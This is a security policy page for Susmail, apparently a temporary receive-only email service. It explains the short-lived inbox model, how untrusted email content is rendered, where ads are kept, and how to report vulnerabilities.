Security at Susmail
Susmail handles untrusted email content, so its security model is deliberately conservative. The service is designed around short-lived receive-only inboxes, limited recovery expectations, cautious rendering, and clear separation between public editorial pages and sensitive inbox or message-reading surfaces.
Short-lived inbox model
Temporary inboxes are meant for low-risk one-time workflows. They are not accounts, permanent mailboxes, or recovery identities. When an inbox expires or is burned, users should assume the address and messages cannot be recovered through product support. This limit is intentional: long recovery windows would make a disposable inbox behave more like a durable mailbox without the account controls users expect from one.
Email content is treated as untrusted
Incoming emails are controlled by third-party senders. Susmail surfaces extracted codes and likely action links for convenience, but users should still check message context before clicking. HTML previews are isolated and remote images are blocked by default so opening a message does not automatically fetch sender-controlled tracking pixels.
Loading remote images, opening external links, or entering information on another site can expose information to that site. Susmail can reduce some message-open leakage, but it cannot make an external service private or trustworthy.
Advertising and sensitive surfaces
Advertising is not intentionally placed inside temporary inboxes, message readers, HTML email previews, abuse reporting flows, API routes, or operator dashboards. Ads, when configured, are limited to public informational pages such as guides, use cases, comparisons, and the FAQ. This keeps ad code away from uncontrolled third-party email content and empty app states.
Reporting vulnerabilities
If you believe you found a vulnerability in Susmail, contact [email protected]. Include reproduction steps, affected URLs or APIs, expected and actual behavior, and whether the issue may involve message contents, temporary addresses, cookies, or operator-only surfaces.
Please avoid destructive testing, spam, attempts to access data that is not yours, or public disclosure before the issue can be reviewed. Abuse reports involving phishing, malware, or harmful third-party email content should go through the abuse page instead.